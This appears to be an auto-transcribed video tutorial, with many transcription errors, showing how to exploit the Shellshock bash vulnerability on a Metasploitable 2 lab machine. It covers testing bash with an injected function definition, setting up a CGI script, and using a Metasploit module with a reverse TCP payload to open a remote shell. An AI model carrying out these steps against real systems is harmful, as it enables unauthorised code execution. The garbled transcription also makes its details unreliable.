Hey guys. So in this video I want to show you guys how you can exploit a shellshock vulnerability using Metasploit Framework, shellshock vulnerability. It's also called as a bash vulnerability, because it's primarily based on Paschal, what it exactly is like, if your bash if your systems bash shell is vulnerable, and it's most likely that you're also prone to this shellshock vulnerability. It works by allowing an attacker to append commands to function definitions and the values of enrollment variables. So this would be classified as a type of code injection attack, because, you know, you're injecting you're putting code in there. That's why and then since bashful processes commands offer the function definition, pretty much any arbitrary code that is after that function definition, will be executed.

So it's kind of like it's a classic example of an AC e vulnerability, arbitrary code execution. You can easily check if you're, if a machine is vulnerable to bash on on by typing like simple commands. So in this for this video, I picked a metaphorical tool again to check this to see if it is vulnerable to dispatch vulnerable to not. So I'm going to open it up our shoes. So let's go to VirtualBox which is actually open. So let's go over there.

I'm going to type a simple command to test if it's vulnerable or not. So let's see and open up a function and I'm just going to put a colon there, close it back up. And then I'm just gonna put some some other command after the function definition, like, go hacked. And then I got and then let's say bash, sick. So basically what I'm doing here is that I created a function, and then I have colon in there. So the code And it's built in performs no action, which is perfect for us.

Because we only want our code to do anything, we just want our function to do anything, we just want the code after function which is echo had to be executed. Because it because this colon is just basically it's us here, we're a non empty command is required. And this bash does see, it creates an instance of bash that runs this colon and just exit. That's basically what's happening here. So if my code is right, and if the bash of the target machine is vulnerable, and I should get something like hat as my coat, let's see. Perfect.

So as you can see, the bash shell of this particular target machine meta splittable to as well normal. That means it's also vulnerable to a shell shock exploit. My next step would be to create an executable script in our target machine. And so that could be x From our attack machine, so let's do that. Let's go to user bin. CGI.

So that's where you can save scripts and execute and access externally from a browser. So I'm just going to create, go to CGI bin. Okay. And open it up and let me do. Let's, let's create. Let's create something.

I mean, let's create, let's say tact. Data Search it up. All right, so I'm going to do something like just just some simple text file, which could which would pull up and it would be an HTML file, which would just say hello, yeah, so let's do something like that. So I'm going to create a bash strip. Just the basic stuff. So just go with bin bash.

And then I'm going to code. So I'm going to this is going to be the content type, which in this case, is going to be text. html, because we want the user to access it by a browser. So content type, I'm gonna put it as text. html, and just close it. And just want a coach nothing and then just echo like something I don't know, just put something like, let's say, x again.

So there we go, we have simple code, which will execute or should give you a which display hat on the browser HTML page. So let's exit. Save it. Perfect. Now let's give permissions for this particular fall. So that's So then we're just gonna put sudo ch mod 755 in our file name, just see if we have it in there.

Now let's go through a web browser and access is pretty good. Now let's see what is the IP address, first of all 1921240 1.9. So let's go to Kali again, go to browser and try to access this machine. So we're going to try to see if you're able to get this file. I'm going to go 192168 and it was I think it was 149. And then I'm just going to type CGI CGI bin and our filename which was hacked.

Awesome. So we got it working. So that code is working right there, it's getting executed. Now we need to look for shellshock vulnerability. So let's go to Kali back up and open Meadow sploit framework, which is going to support so once you open that up, we're gonna look for this shell shop and try to find an exploit which would give us a back and forth connection. So let's search for Shell shell.

You gotta pick up plenty. Let's search for something. Let's see, let's see what we have here. So yeah, I'm gonna get something like an Apache. Let's hit there's an Apache one. exploit, we got this one.

That works, we can use that. copy that and then just use it. Use Paste. Awesome. And now let's see what option it has or we can fix it up. So we got it nice our hosts going to set that up.

Let's do that real quick sets. And then oh wait. And then we also need target URL. All right, which is the part of the CGI script, which we just created. So you got to do both set our host as 1921680149, which is our meta exploitable to the IP address. Once you set the target, you're right.

Target you type to target. You are all and I'm just kidding. Is your CGI slash bin and the name of the file, which was tagged.sh. And then just enter. So we got our retarget URL set. And then we got the artist are you going to do now to set a payload so that it can have a back TCP connection back?

So you can do, let's just say show payloads. And I'm looking for something that could give me a TCP connection back, right? So I'm going to look for, like, reverse TCP, stuff like that. There's one right here. Yep, that's all works. We can just say that.

So let's get let's copy that. And then set the payload. So payload and then just paste it. And now we have the payload set. Let's see options again, just in case we are missing something. Yep, we are.

So we got to figure out We gotta get our l host. Set. So let me just open up another tab and see some 48 awesome. So let l host of 192 168 01 48. That's it. All you got to do is just, let's check.

Let's check it out as well. Verbal, started. Awesome. So don't just you that is vulnerable. All you got to do is just exploit or you can also use run command whatever you want to use. There you go.

So we successfully exploited it. Command shell is open. If you type something like ID, it should show you what you have. And you can type to give you the data and stuff. You can see very rare. pw two that will give you the path.

There you go. So You're able to exploit shellshock vulnerability. Here's my framework. Hope you enjoyed this video. See you in the next one.